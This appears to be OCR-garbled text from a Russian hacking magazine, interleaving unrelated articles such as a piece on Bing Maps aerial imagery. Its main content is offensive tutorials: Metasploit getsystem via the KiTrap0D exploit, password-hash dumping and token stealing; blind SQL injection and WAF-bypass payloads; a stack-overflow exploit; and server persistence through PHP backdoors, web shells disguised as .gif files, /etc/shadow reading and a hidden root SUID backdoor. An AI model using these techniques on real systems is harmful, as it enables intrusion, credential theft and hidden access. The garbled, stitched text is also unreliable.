С :\^Ш«5\5уЗСеп02\ЗѵСІ10БС. ехе 
С : \М1 ГФ0^5\зу 51 етЗ 2\5ѵс іхізС , ехе 
С : 4^3 МОО^бЧаузС етЗ 2\5рао1 5Ѵ, вхе 
С : ЧѴЯ Н00^5\ЁХР 1 о гег . ЕХЕ 

С :\Ргодга/п РЧ1 а ДМ^аг в\ѴМйи.г в Трді 5\ѴМмагвТг 

С : \Ргодгаді Рі 1 е 5Ч™«А'Г еЧ'УИиаг е Тоо 1 еОе I 

С :\Ргадгаді РіІезЧѵи^геЧѴМ^аг’е Тооі&ЧѵкпСооізеі 

С : ЧРгадлат Рі 1 е 5\ѴМ«аг е\Шуаг е Тоо 1 5\ѴН0р дгасі 1 

С : ЧМ ГФОИ5\5узС етЗ 2Ча1 д . ехе 
С : 4^1 ГФ0Ы5Ч&У БѣеніЗ 24^5 с пгС Ру . вх е 



ПОЛУЧАЕМ СИСТЕМНЫМ АККА- 
УНТ В МЕТАСПЛОИТЕ 




1 Пхі* 



& 



Ріхк 



ЧТОБЫ НЕ ПАРИТЬСЯ С ГРУППО- 
ВЫМИ ПОЛИТИКАМИ, МІСР050РТ 
ПРЕДЛАГАЕТ АВТОМАТИЧЕСКИЙ 
СКРИПТ РІХІТ! ДЛЯ ВРЕМЕННОГО 
РЕШЕНИЯ ДАННОЙ ПРОБЛЕМЫ 



к* 



КРАДЕМ ТОКЕН НУЖНОГО ПРОЦЕССА 



// Надіе С5 гедиіг&і Іес «фізіъіііег. 

ЛЬ . ѵд-сст^ехі , 5»дСа ■ 0 х ОВ : 

/У Роіпъег г..: ГаКе Кег^еІ гтвсй 
Т1Ь.\Шва«хс.Еіі - &Квг^»І5сасХ; 

// Над і.с 1 Р гедиігеі Ют схрітісіап 

I іЬ , ѵдг.СсГиіехі , 3 ір ™ Кі35 63ісэС*1ІКет;^:гЛЗі:*аіл ; 



-Ъ. Неір Ваппег. 

-В ТЬе ВесЬпірие Во изе. (БеВаиІВ 
Во ' 0 ' ) . 

0 : АН ВесЬпіриез аѵаіІаЫе 

1 : Зегѵісе — Ыашесі Ріре 
ІтрегзопаВіоп (Іп Метогу /Асітіп) 

2 : Зегѵісе — Ыатесі Ріре 
ІтрегзопаВіоп (Бгоррег/ Асітіп) 

3 : Зегѵісе — Токеп БиріісаВіоп 
( Іп Метогу / Асітіп ) 

4 : ЕхрІоіВ — КіТгарОБ (Іп Метогу/ 
ВГзег ) 



теВегргеВег > деВиісі 

Зегѵег изегпате: ЬТ АБТНОКІТУХ 

ЗУЗТЕМ 

Есть! Всего одна команда в консоли мета- 
сплоита и права І\ІТ АиТН0ВІТУ\5У5ТЕМ у 
нас в кармане. Далее, вообще говоря, можно 
все. При этом напомню, ни одного патча от 
МісгозоЬ на момент выхода журнала еще не 
было. 



ИсСііЕ сег.ьТеЬ () -ЖеаегѵеіН Щ - ІііЬ: 



КсѴапу^спБЕаІ (Ѵйи^'п-йЕсЕкісіліівп г НШ.Ц ; 



ДАМПИМ ПАРОЛИ 



КЛЮЧЕВЫЕ СТРОЧКИ В ИСХОД- 
НИКЕ СПЛОИТА 



сплоит и затем команду базббитр для того, 
чтобы локально извлечь из реестра хеша, 
совсем не обязательно. Но если такая воз- 
можность есть, почему бы и нет? 



Как видно, сплоит КіТгарСЮ реализует лишь 
часть функциональности команды. Если тебе уда- 
лось отхватить шелл с пользователем, у которого 
уже есть права администратора, то для поднятия 
до уровня І\ІТ АІЯН0РІТУ\5У5ТЕМ можно исполь- 
зовать три другие техники (выбрать нужную 
позволяет ключ -і]. Так или иначе, не указав 
вообще никаких параметров, мы укажем мета- 
сплоиту, что тот может использовать любой из 
подходов. В том числе и КіТгарСЮ, что повысит 
наши привилегии до уровня «Система», какими 
бы правами мы сейчас ни обладали. 

теРегргеСег > деРзузСет 

. . .доР зузРет (ѵіа РесЬпідие 4) . 

Ага, получили сообщение об успешном повы- 
шении привилегий, причем для атаки исполь- 
зовался именно КіТгарСЮ — видимо, у него 
приоритет. Действительно ли мы поднялись в 
системе? Проверим наш текущий II Ю (иденти- 
фикатор пользователя): 



Раз уж на руках есть доступ к системному 
аккаунту, то надо извлечь из этого что- 
нибудь полезное. В арсенале Меіазріоіі: есть 
замечательная команда Ьазббитр — более 
продвинутая версия известной утилиты 
рѵѵбитр. Более того, в последней версии 
метасплоита включен переработанный вари- 
ант скрипта, который использует модерни- 
зированный принцип извлечения ЕАІЧМАІЧ/ 
І\ІТЦѴ| хешей и пока не детектируется 
антивирусами. Но смысл не в этом. Важно, 
что для выполнения команды базббитр 
необходимы права І\ІТ АІЛН0ВІТѴ\5Ѵ5ТЕМ. 

В противном случае программа выдаст 
ошибку «[-] ргіѵ_ра55ѵѵ(і_деІ_5ат_Ма5Ье5: 
Орегабоп іа і ІесІ : 87». Происходит это потому, 
что ЕАІ\ІМАІ\І/І\ІТиѵі-хеши паролей пользова- 
телей хранятся в специальных ветвях рее- 
стра Н КЕУ_ЮСАЕ_М АСН I N Е\5АМ и НКЕѴ_ 
Е0САЕ_МАСНІІ\ІЕ\5ЕСПВІТѴ, которые недо- 
ступны даже администраторам. Их можно 
прочитать только с привилегиями системно- 
го аккаунта. Вообще говоря, использовать 



теСегргеСег > деіиісі 

Зегѵег изегпате: Ш? АБТНОЕІТУХ 

ЗУЗТЕМ 

теСегргеСег > гип ЪазМитр 
[*] ОЬСаіпіпд Ыое ЬооС кеу... 

[*] Саісиіакіпд кке кЪоок кеу 
изіпд ЗУЗКЕУ Зесі7 [ . . . ] 

[*] ОЬкаіпіпд Рііе изег ІізС апсі 
кеуз . . . 

[*] Бесгуркіпд изег кеуз... 

[*] Битріпд раззілгогсі Ьазкез . . . 

Асітіпізкгаког : 5 0 0 : аасі2ЬЬЬе2Ь5Т404е 
еаасіЗЬ435Ь5Т4ее : . . . 

Сиезк : 501 : аасіЗЬ43 5ЬааааеааЗЬ43 БсіЗЬ 
435Ь5І4аае04ее : . . . 

НеІрАззізкапк : ТО 0 0 : сеіа2 909Ьсі5Ь0І4 
602Т68042І2І646: . . . 

Хеши получены. Остается скормить их какому- 
нибудь из брутфорсеров, например, ШрЫюгаск 

( ѵѵѵѵѵѵ.ІОрЫсгаск.сопп ]. 
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решения уязвимости пока нет, придет- 
ся воспользоваться обходными путями. 
Самый надежный вариант — отключить 
МЗБОЗ и ѴѴОѴѴЕХЕС подсистемы, что 
сразу лишит сплоит функциональности, 
т.к. он больше не сможет вызывать функ- 
цию ІЧіѴсІтСопІтоШ для запуска ЫТѴОМ- 
системы. В старых версиях ѴѴіпсІоѵѵз это 
реализуется через реестр, в котором нужно 
найти ветку НКЕУ_Е0САЕ_МАСН1ЫЕ\ 
5У5ТЕМ\Си ггепіСопІгоІЗеЕХСопІго 1\ѴѴ0ѴѴ и 
добавить какой-нибудь символ к ее назва- 
нию. Для современных ОС устанавливать 
ограничение на запуск 16-битных при- 
ложений надо через групповые политики. 
Для этого вызываем 0РЕБІТ.М5С, далее 
переходим в раздел «Конфигурация Поль- 
зователя/Административные шаблоны/ 
Компоненты ѴѴіпсіоѵѵб/Со вместимость 
приложений» и активируем опцию 
«Запрещение доступа к 16-разрядным при- 
ложениям». 



N1 АІІТН0РІТУХ5У5ТЕМ 




ДАМП ХЕШЕЙ ПАРОЛЕЙ ПОЛЬЗОВАТЕЛЯ ВОЗМОЖНО ПОЛУЧАТЬ 
ТОЛЬКО С ПРАВАМИ ЫТ АІЯН0КІТѴ\5Ѵ5ТЕМ 




ЗАПРЕЩАЕМ ДОСТУП Кіб-БИТНЫМ ПРОГРАММАМ В«СЕМЕРКЕ» 




НТТР://ѴѴѴѴѴѴ 

■| Г 

> Ііпк5 

Описание уязвимости 
от автора сплоита: 

агсбіѵез. 
пеобарзіз.сот/ 
агсЫѵезЛиЦсІізсІозиге/ 
201 0-01 /0346.Ы:тІ . 

• Временное ре- 
шение для устра- 
нения проблемы от 
МісгозоЛ: зиррогТ 
тісгозок.сот/ 
кЬ/979682 . 



КАК ВЕРНУТЬ ПРИВИЛЕГИИ? 

Забавная ситуация произошла, когда я попытался вернуть 
права обычного пользователя обратно. Найденная коман- 
да геѵ2зе11 : не срабатывала, и я по-прежнему оставался 
«ЫТ АІІТН0РІТѴ\5Ѵ5ТЕМ»: видимо, она предназначена 
для работы стремя другими подходами, реализованными 
в деТзузТет. Оказалось, чтобы вернуть привилегии, необ- 
ходимо «украсть» токен процесса, запущенного тем поль- 
зователем, который нам нужен. Поэтому отображаем все 
процессы командой рз и выбираем из них подходящий: 

шеСегргеСег > рз 

Ргосезз ІізС 



РІБ Раше АгсЬ ІІзег РаСІі 



0 [ЗузСеш Ргосезз] 

4 ЗузСеш х8 6 ЫТ АІІТНОКІТУ\ЗУ5ТЕМ 

37 0 зшзз.ехе х8б ЫТ АШ?НОКІТѴ\5У5ТЕМ \ 

ЗузСешЕ.ооЦ\ЗузЦет32 \зтзз . ехе 



Ф 1558 ехріогег.ехе х8б ШШХР8РЗ \изег С:\ 
ШШСЖЗ\Ехр1огег . ЕХЕ 



> іпіо 

Информация пред- 
ставлена в образо- 
вательных целях. 
Использование ее 
в противозаконных 
целях может повлечь 
за собой уголовную 
ответственность. 



Как мы видим, ехріогег.ехе запущен как раз под обычным 
пользовательским аккаунтом и имеет РЮ=1560. Теперь, 
собственно, можно и «украть токен», заюзав команду 
зІеаПокеп. В качестве единственного параметра ей пере- 
дается РЮ нужного процесса: 

теСегргеСег > зкеа1_Ьокеп 1558 

ЗСоІеп Рокеп мікЪ. изегпате: ШШХРЗРЗ \изег 

текегргекег > декиісі 

Зегѵег изегпате: ШЫХР8РЗ \изег 



Судя по полю «Зегѵег изегпате», операция выполнилась 
успешно. 

КАК ЗТО РАБОТАЕТ? 

Напоследок стоит рассказать о природе уязвимости, 
приведшей к появлению сплоита. Брешь в защите 
возникает по вине ошибки в обработчике системно- 
го прерывания #СР (который называется пНКіТгар). 
Из-за нее с привилегиями ядра может быть выполнен 
произвольный код. Это происходит, потому что систе- 
ма неправильно проверяет некоторые вызовы ВІОЗ’а, 
когда на 32-битной х86-платформе выполняется 
16-битное приложение. Для эксплуатации уязвимости 
сплоит создает 16-битное приложение (%ѵѵі п сі і г% \ 
Іѵѵипк_1 6. ехе), манипулирует с некоторыми системны- 
ми структурами и вызывает функцию ЫіѴсІтСопІгоК], 
чтобы стартовать ѴѴіпсІоѵѵз ѴИиаІ Б05 МасЫпе (ака 
подсистма ІЧТѴБМ], что в результате предыдущих 
манипуляций приводит к вызову обработчика систем- 
ного прерывания #6Р и срабатыванию сплоита. 

Кстати говоря, отсюда вытекает и единственное 
ограничение сплоита, который срабатывает только 
на 32-битных системах. В 64-битных операционках 
банально нет эмулятора для запуска 16-битных при- 
ложений. 

Почему информация с готовым сплоитом попала 
в публичный доступ? О наличии уязвимости автор 
сплоита информировал МісгозоІТ еще в начале про- 
шлого года и даже получил подтверждение, что его 
отчет был принят к рассмотрению. Только воз и ныне 
там. За год официального патча от компании не 
последовало, и автор решил опубликовать инфор- 
мацию публично, надеясь, что дело пойдет быстрее. 
Посмотрим, выйдет ли заплатка к моменту появления 
журнала в продаже :)? ц-ц 
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■ ■ СТЕПАН «СТЕР» ИЛЬИН ТѴѴІТТЕР.С0М/5ТЕРАН 





Ровно пять лет назад, 8 февраля 2005 года, 
был впервые представлен сервис Соодіе 
Марз. То, что когда-то казалось прерогативой 
спецслужб и игрушкой в руках режиссе- 
ра блокбастеров, стало доступно каждому. 
Вспомни сам, как искал свой дом на снимке 
со спутника и как, вероятно, расстраивался, 
если твоего города не было в хорошем раз- 
решении. За столько лет изменилось многое: 
разработчикам был представлен АРІ для рабо- 
ты с сервисом, на котором сейчас построен 
миллион и еще один проект, векторные карты 
дополнились, спутниковые снимки обнови- 
лись, а к возможности понаблюдать за Землей 
с орбиты добавился нереальный эффект 
присутствия благодаря режиму Сігееіз Ѵіеѵѵ. 

За счет отснятых на специальные камеры 
панорамных изображений стало возможным 
покататься по многим городам мира на маши- 
не и смотреть на 360 градусов по сторонам. 
Правда, Соодіе пока оставил за бортом города 
России, но, к счастью, про Родину не забыл 
Яндекс, который начал с малого — снятой 
подобным образом Москвы :). Впрочем... это 
уже давно не торкает — привычно и обыденно, 
все-таки который год используем. А вот, что 
действительно меня заставило почувствовать 
«Вау!»-эффект, так это режим ВігсГз Еуе сер- 
виса Місгозоіі: Віпд ( ѵѵѵѵѵѵ.Ыпд.сопп/ппарз ). 
Скажи, что можно увидеть на обычных спут- 
никовых снимках города? Одинаковые крыши 
домов и причудливые тени высоких зданий, 
очертания которых с такого угла съемки не 
узнать, — одна картина, что Лондон, что 
Париж, что Москва. Снимки ВігсГз Еуе («пти- 
чий глаз») — кардинально другое дело. Вместо 
изображений со спутника используются аэро- 
фотоснимки, снятые под углом 45 градусов и 
позволяющие посмотреть на город, как если 
бы ты сам летел на самолете, различая не 



то чтобы даже здания, но и подчас вывески 
отелей, модели машин и силуэты людей. Мало 
этого, одно и то же место можно посмотреть 
со всех четырех сторон, крутя изображения, 
как если бы это был город в СітСіІу. Словом, 
мега-вещь! 

Если какое-то место тебя особенно заинте- 
ресовало, то можешь «проехаться» по нему 
с помощью СоодІеСігееЕз, причем сервисы 
можно удобно связать между собой благодаря 
инструменту ОиаІМарз ( ѵѵѵѵѵѵ.ппарсЬаппеІз. 
сот/сіиаіппарз.азрх ]. Ничего не мешает сде- 
лать и свое решение, документация для раз- 
работчиков и описание АРІ есть на Ыпд.сот/ 
сіеѵеіорегз . Увы, для просмотра пока доступны 
только сотня городов США, Канады и Японии, 
а также 80 локаций в Европе — то, что успела 
отснять компания Рісіютеігу, у которой до 
России пока руки недошли. Нельзя и скачать 



карты для офлайн-просмотра, правда, на 
форуме разработчиков ЗАЗ. Планета ( заздіз. 
ги/зазріапеіа ]. замечательной программы для 
кэширования изображений с картографиче- 
ских сервисов, говорят, что способ совладать с 
Віпд'ом уже найден и скоро будет реализован. 
Интересно, что аналогичной функции пока 
официально нет ни у Соодіе, ни у УаГюо (зато 
для стран Скандинавии есть у компании 
Епіго: ѵѵѵѵѵѵ.епіго.сопп ]. Но это только пока! 
Если немного покопаться, то можно найти 
проект Соодіебиіісііпдппакег ( зкеісбир.доодіе. 
сот/ЗсІѵѵагебоизе/ЬиіІсІіпдппакег ). в котором 
каждый может помочь компании в создании 
30-объектов разных зданий. А теперь угадай, 
на основе чего создаются 30-модели? Как 
раз аэрофотоснимков! Любой желающий 
открывает изображение города, для которого 
имеется аэрофотосъемка, выбирает здание и 
с помощью простых инструментов рисует его 
каркас. Соодіе, в свою очередь, обрабатывает 
данные, извлекает в соответствии с каркасом 
нужные участки фотографий, снятых с 4-х 
разных сторон, и выдает готовый 30-объект 
(его можно скачать и использовать в других 
программах]. Результат (правда, пока очень 
скудный] уже сейчас можно посмотреть, 
подключив в программе СоодІеЕагіЬ (еагЛъ 
доодіе.сот/іпіі/ги ] соответствующий слой. 
Напоследок — интересная деталь. На самом 
деле, одновременно с СоодІеМарз, то есть 5 
лет назад, был представлен и просмотр аэро- 
фотоснимков онлайн. Не в виде довольно 
тормозного веб-сервиса на ЗіІѵегІідЫ, а с 
помощью программы ѴігІиаІЕагіЬ, которую мы 
не раз выкладывали на диске :]. т 
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■ ■ Андрей Комаров котагоѵОіісІе^епсе.ги 
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ЗАДАЧА: ОБОЙТИ ФИЛЬТРАЦИЮ СИМ- 
ВОЛОВ ЗАПЯТОЙ ПРИ ПРОВЕДЕНИИ 
50ЫШЕСТІ0Ы 



0К Р за проста кой же, каки при 

іб=1 апб 1=1-- 



РЕШЕНИЕ: 

Задача не банальная. Хоть и встречается редко, но, как правило, ставит в 
тупик многих людей. Допустим, мы имеем такой код: 

<?рЪр 

11 (іззеР ($_СЕТ[ ' іб' ] ) && $_СЕТ[ ' іб' ] ! = ' ' ) { 

$гер1асеб = ргед_гер1асе $_СЕТ) ; 

здесь какие-то запросы с использованием переменной $гер1асеб 

Кчемуже мы приходим? Невозможно использовать конструкцию ипіоп 
Беіесі, если в запросе участвует больше 2-х полей. ОК, крутим какслепую, 
скажешьты. Но в данном случае большинство известныхспособов, таких 
как использование функций зибзІтіпдО, тіб(], ЕхІгасіѴаІиеО, атакже 
последние наработки Оѵѵагаг’а в области раскрутки слепых инъекций 
работать не будут. Что же делать? Будем использовать логику 5СИ_-выра- 
жений, и здесь поможетнам ЫКЕ. 

Для начала узнаем версию: 



Аэтозначит, что первый символ версии мы подобрали успешно. Я думаю, 
ты понял, что делать дальше, ноя все же покажу. 

Узнаем названия таблиц в іпіюгі7іа1:іоп_5сЬеппа.1:аЬІе5; желательно знать 
примерное название колонки, если нас интересует та блица с юзерами, я 
делаю обычнотак: 

іб=1 апб (зеіесР 1 Ігош іпіогтаРіоп_зскета. соіитпз ѵбіеге 
со1шпп_пате Ііке '%разз%' апб РаЫе_пате ііке 1 и% , )-“ 

В данной конструкции ‘%разз%’ остается неизменным, а подбираем мы 
именно {аЫе_пате. Если первыйзапроспрошелудачно, тогда пробуем 
подобрать второй из СИМВОЛОВ: 

іб=1 апб (зеіесР 1 Ігош іпіогтаРіоп_зскета. соішппз ѵбіеге 
со1шпп_паше Ііке '%разз%' апб РаЫе_пате Ііке ' из%')-- 

И такдалее. Предположим, мы получили имя таблицы изегз и колонки 
изегпате, раззѵѵогб.іб. Составим запрос на получение пароля из базы: 



іб=1 апб ѵегзіоп ( ) Ііке 1 4% 1 — 

Если запрос не удался, значит, версия, отличная от 4*. Пробуем по- 
другому: 

іб=1 апб ѵегзіоп ( ) Ііке ' 5%' -- 



іб=1 апб (зеіесР 1 ігош изегз ѵбіеге іб=1 апб раззѵгогб ііке 
'ф') — 

Подбирается по образуй подобию предыдущих запросов. Символ % в 
конструкции ИІКЕ говоритотом, что после ‘ц’ находится 1 и более любых 
символов. 




ЗАДАЧА: ПЕРЕДАТЬ УПРАВЛЕНИЕ ПО 
ОПРЕДЕЛЕННОМУ АДРЕСУ В ПАМЯТИ 
ПОСРЕДСТВОМ ВІІРРЕР ОѴЕРРЬОѴѴ 



ОехР ( ) ; 

геРигп_іприР (агдѵ[1] ) ; 
геРигп 0; 

} 



РЕШЕНИЕ: 

Это, так сказать, один из первыхшагов в написании эксплоитов и шелл-кодов 
для программ, подверженных переполнению стека. Я не буду рассказывать про 
все аспекты работы с памятью, затрону лишь основное. Итак, имеем уязвимую 
программу: 

#іпсіибе "зібіо.к" 

ѵоіб геі.игп_іприі: (скаг *з) { 
скаг аггау [12] ; 
зкгсру (аггау , з) ; 
ргіпбі ( "%з\п п , аггау); 

} 

ска г СехТ () { 
ргіпбі ( "ЕхатріеХп" ) ; 

} 

таіп ( іпб агдс, скаг *агдѵ[] ) { 



В этом случае переменная аггау объявлена сустановленным размером в 12 
байт, но при копировании проверки на дли ну да иных не происходит. Скомпи- 
лируем и попробуем передатьпрограммебольшеЗОбайт: 

зрубегѲІЗЗС : ~/с> . /Ъоі ААААААААААААААААААААААААААААААААААААА 

АААААААААААААА 

Ехашріе 

ААААААААААААААААААААААААААААААААААААААААААААААААААА 
Ошибка сегментирования (соге бшпреб) 

Посмотрим на дамп памяти: 

зрубег@133Р : ~/с> дбЬ Ъоі соге 



Соге тз депегаРеб Ьу 1 . /Ъоі ААААААААААААААААААААААААААААААААА 
АААААААААААААААААА ' . 
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іагрузка рсар-файла в программу 
,ля визуализациитопологии 




Ргодгат бегтіпабесі тбіі зідпаі 11, Зедтепбабіоп баиіб. 

#0 0x41414141 іп ?? () 

Символы 0x41 (А) переполнили стеки заполнили собой регистры еЬр и еір. Ре- 
гистр еір указывает на адрес возврата, область в памяти, куда должно перейти 
управление программы. Наша задача — подменить еір на нужное значение. 
Для примера вызовем функцию іехШ во второй раз. Для этого надо узнать ее 
адрес в памяти: 



зрусІег@133б : ~/с> дйЪ Ъоб 
(дсІЬ) йізаз шаіп 

Бшпр об аззешЫег сойе бог бипсбіоп таіп: 



0x0804848(1 <таіп+0> 
0х0804848е <таіп+1> 
0x08048490 <таіп+3> 
0x08048493 <таіп+б> 
0x08048496 <таіп+9> 
0х0804849Ь <таіп+14> 
0х0804849е <таіп+17> 
0х080484а1 <таіп+20> 
0х080484аЗ <таіп+22> 
0х080484а6 <таіп+25> 
0х080484аЬ <таіп+30> 
0х080484Ь0 <таіп+35> 
0х080484Ы <таіп+36> 



ризЬ. %еЬр 
тоѵ %езр,%еЬр 

$0хббббббб0 , %езр 
$0x10 , %езр 
0x8048479 <бехб> 

Охе (%еЬр) , %еах 
$0x4 , %еах 
(%еах) , %еах 
%еах, (%езр) 

0x8048454 <гебигп_іприб> 
$0x0 , %еах 



апй 

зиЪ 

саіі 

шоѵ 

айй 

тоѵ 

тоѵ 

саіі 

тоѵ 

Іеаѵе 

геб 



Видим вызов функции бехб 

0x08048496 <таіп+9>: саіі 0x8048479 <ІехІ> 

В моем случае адрес — 0x08048496. Теперь напишем небольшой эксплоит для 
перезаписи адреса возврата значением 0x08048496. Для этого потребуется 
отправить программе 12 байт мусорного кода, которые заполнят стек, еще4 
байта, которые заполнят регистр еЬр, и, наконец, наши 4 байты, которые попадут 
в регистр еір. Так как компилятор дсс использует определенную оптимизацию, 
нам нужно передать еще 6 байт мусорного кода. В итоге сплоит вы гл ядиттак: 



таіп ( ) { 




Установка взаимоотношений между отдельным ІР и всеми хостами, 
обнаруженными в эфире 

сЬаг збибб[]= « АА АААА АААА ААА АААА АААА ААА \х96\х84\х04\х08»; 
ехесір ( " . /Ъоб" , " . /Ьоб" , &збибб ,ШШ) ; 

} 

Стек работает с методом доступа кэлементам ПРО (І_азІ Іп — Рігзі Оиі, «пос- 
ледним пришел — первым вышел»), и поэтому мы указываем байты в обратном 
порядке. Пробуем запустить наш эксплоит: 

зрус!ег@133б : ~/с> ./еір 
Ехатріе 

АААААААААААААААААААААААА? ? 

Ехатріе 

Какты можешь видеть, функция ІехД] выполнилась второй раз, что говорит о 
том, что мы удачно изменили адрес возврата. 




ЗАДАЧА: УЗНАТЬ ИМЕНА КОЛОНОК 
В ТАБЛИЦЕ, ЗНАЯ ЕЕ НАЗВАНИЕ 



РЕШЕНИЕ: 

Представлю недавно опубликованный на форуме зіа.скегз.огд юзером 
Раіс способ, с помощью которого можноузнать имена колонок, если они 
имеюттип І\ІОТІ\ІІ)І_І_. Отправляем первый запрос, чтобы узнать, сколько 
колонок в нужной нам таблице: 



ісі=1 апсі (зеіесб * бгот изегз) = (1) 

В результате Му50І_ вернетошибку «Орегапб збюиісі сопіаіп 7 соіитп(з)». Это 
значит, что втаблице изегз 7 полей. Тогда составим логически верный запрос: 



ісі=1 апсі 11,2,3,4,5,6,7) = (зеіесб * бгот изегз ипіоп зеіесб 
1,2, 3,4, 5, 6, 7 Іітіб 1) 

Запрос верный и ошибки мы не увидим. Атеперьотом, как узнать имена 
колонок. 

Для каждого поля в запросе поочередно подставляем последователь- 
ностьсимволов %0 и, еслиу поля стоит ключ ІЧОТ І\ІІ)І_І_, мыувидим 
ошибку. Посмотрим на примере: 

ій— 1 апй (1,2, 3,4, 5, 6, 7) = 

(зеіесб * бгот изегз ипіоп зеіесб 1%0 , 2 , 3 , 4 , 5 , 6 , 7 
Іітіб 1) 

В итоге видим ошибку «Соіитп ‘ісГ саппоі Ье пиіі». 
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Переполняем буфер программы символами А 



№4 



ЗАДАЧА: ЗАКРЕПИТЬСЯ НА ВЗЛОМАН- 
НОМ СЕРВЕРЕ 



Файл Праекэ Вид журнал Закладки Настройка Справка 

зпй "зіикд’ ѵюггатіу" Тог йеГаІІБ, - 

тм$ ео-в ейп ТібУге сі а г ,р іБ 86 - 505 е- 1 ;ших” . 

Рог Ьи§ г€рогТ1п§ іпзТ гис ІІОЛ5 ^ ріеазе 5«е: 
<Ъі*р:/Лѵ^..§пц..оГЁ/50І^эге/вй&/Ьив$/>. . . 

ЙеаЯіп® з у івйоі з 1 го ш / Лоя е/зругіе г/с /ЬоТ . . . ао ле . 

латіпц: СапЧ геай раИ-іпате Тог Іоай тар: Ошибка ввода/ выв ода. 

КеайііпЕ зуяЬоІз Тгов /І1Ь/1іЬе-2ЛОЛ .вс. , .Кеайіпе зулЬоІз Тгор /ивг/ІіЬ/йеЬид/І 

іЬ/ііЬс-2 . 10.1 .за . йеЬи|,. . . йоле . 

йоге. 

ЮДЙОЙ ЗувЬОІЗ Тог /1ІЬ/ИЬС-2. 10.1 .50 

йеайіл| зутЬоІз Тгои /іі.Ь/Ій-2,10.1 . зо, . .йеайіпв зутьоіз Тгот /изг/НЬ/йеЬч'^/НЬ 
/ІЙ- 2 . 10.1. зо. йсЬир, . . йопё . 



Юайей зуаЬѳІз ТОг /ІіЬ/ІЙ-2 . 1 0 . 1 .30 

Соге А'эз §епе гатей Ьу * ./Ьоі АААААААААААААААААА ААМААф ' 
Рго;ЕГЗ« Те пп і па т ей Л'ІТЛ Зтцла! 11. 5й І §п?еіПІ:8'ТІЙгіі ТаиН- 
ЯО 0x08048494) *л яаш () 



РЕШЕНИЕ: 

Рассмотрим случай, если у нас права не гооЕ Для начала нужно пробекдорить 
различные пшп-файлы функциями, через которые можно выполнять команды 
либо РНР-код. Вотнебольшой ихсписок. Самые палевные: 

зуз1:ет( ) 
раззСЬги ( ) 
ехес ( ) 

зЬ.е11_ехес ( ) 
рспЫ_ехес ( ) 
еѵаі ( ) 

Эти функции очень быстро обнаруживаются админами, поэтому можно 
использовать менее популярные и менее известные: 

аззегЦ ( ) 

ргед_гер1асе ( ) с модификатором е 
$а($Ъ) 
изогС ( ) 
и другие 

Следующее, что следует сделать — это расплодить и спр ятать веб-шеллы. 
Если это какой-либо пабликдвиг, вродеротіа.ѵѵогбргезз илиѵЬиІІеЕп.то 
замаскировать шелл под окружение не очень сложно. Также хорошей методи- 
кой считается маскировка шелла под нестандартные для РНР расширения. 
Рассмотрим такую ситуацию, когда в папке ітадез много картинок, но все они 
и ме ют ра сш и ре н и е з рд . М ы м оже м с п рятать ш ел л в . д іН ка рти н ке ! Дл я это го 
созда ди м здесь . Ыассезз с та ки м соде ржи м ы м : 

АббТуре аррІісабіоп/х-ЕЦЦрб-рІір . діб 

Теперь все .дй-файлы буд^д выполняться какпшп-код. 

Ну а что же делать, когда мы получили рут на сервере и хотим его сохранить? 
Первым делом прочитай файлМс/зЬабоѵѵ, — в нем хранятся пароли всех 
пользователей системы. Стоитсказать, что руткитов под новые версии ядер не 
выпускали оченьдавно, а запускстарых в лучшем случае вызоветошибку, и в 
худшем похоронит сервер. Основными вариантами закрепления на сервере 



0*8 е 

ох+мт-гі 

0*Ь7724340 
0хЬ?722ІТ4 
0*ЫсЬ8710 
0*4 1414141 
0*0 О 

0*0 о 

ОхЭ04849Ь 
0*10232 [ 

0*73 1 

0*7Ь 1 

0*76 1 

0*76 1 

0*0 о 

0*33 5 



-1217248448 
-121 7255388 
0хЬТсЪ8710 
0x41414141 



0*8048496 <ааіп+14> 



[ 5Р ІР ИР 

115 

123 

123 

123 

О 

51 



Смотрим результат в дебагер 



являются: протроянивание ОрепЭЭН и маскировка суидников. Про пакости в 
ОрепЭЭН ты можешь прочитать в статье ЭЬабОЭ’а, которую непременно най- 
дешь в Гугле, а про суидники я расскажу прямо сейчас, благо, тутнетничего 
сложного. Создаем на сервере файл зиіб. с, содержимое которого: 

#іпс1ибе <зЦбіо.1і> 
іпЦ таіп(іпС агдс, сЬаг **агдѵ) { 
зузбепЦагдѵ [1] ) ; 

} 

Компилируемегокомандойдссзиіб.с-озиіб. Суидник (наверняка ты знаешь) 
— это исполняемый файл с зиіб-битом. Суид-бит позволяет выполнять про- 
граммы от имени пользователя, к которому он принадлежит. Эта программа 
принимает параметр и вызывает функцию зузіеті). Попробуем запустить ее 
беззиіб-бита: 

. /зиіб іб 

иіб=3 0 {тт) діб=3 0 (члмм) 

Азвтем из-под руга выполним команду: 
сікжп 0:0 зиіб;сЪтоб 4755 зиіб 
И — выполним от пользователя ѴѴѴѴѴѴ: 

. /зиіб іб 

иіб=30 (ш) діб=30 (ш) едіб=0 (гооб) 

Пусть тебя не смущаетиіб=30,теперьунас полноценные права руга! Нужно 
как следует сп рятать его в каталоге/изг/Ьіп. 




ЗАДАЧА: ОБОЙТИ ЗАЩИТЫ 5ѴѴЕВ 
И РЕТЕКН05ТХ0СТИНГ0В 



РЕШЕНИЕ: 



Эти хостинги отличаются защитой от различных атак, таких как РНР- и 501-инъ- 
екции. Но на деле все защиты легко обходятся. 



► 038 



1)ипіопзеІесЕ 

5ѵѵеЬ — тутзащита только в $_ѲЕТ-переменных; если есть возможность отпра- 
вить данные методом Р05Т, то защита обходится. 

Реіегбозі — фильтруются и $_ѲЕТ, и $_Р05Т переменные, но обходится еще 
проще; достаточно вместо пробела между словами ипіоп и зеіесі вставить 
любые другие пробельные символы, такие каксимвол табуляции, перевода 
каретки и прочее. Вотих неполный список: 
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1 Файл Правка Вид Сервис Настройка 


Оправка 


га? 


Ш 


к ** 


Соідоть Отфьль 


Сй>р*йіТь 




#іпс1исІе іЬ. И* 1 






▼ тэиі О { 






сЬаг 3 = 




АААААААЧк96\х34\)(Ѳ4\кѲа‘ ; 


'!• 'Г"," /1 : 

! 










Строка: 4 Оол&ец: 39 


ВСТАВКА СТРОЧНОЕ С еір.с 



Сорец небольшого эксплоита, изменяющего адрес возврата... 



Организация геѵегзе-зЬеІТ на ѴѴіпсІоѵѵз ѴізІа/7 



%09 

%0а 



%0Ь 



%0с 

%0б 



2) огсіег Ьу. 

В обоих случаях вместо огбег Ьу можно использовать дгоир Ьу, про который 
сотрудники хостингов, видимо, не знают. Также можно написать буквы в разных 
регистрах, оВЬЕг ЬУ, либо использовать вышеперечисленные пробельные 
символы. 

3) РНРчщесбоп. 

Здесь абсолютно никакой защиты нет, разве что свеб хостинг пугает нас 
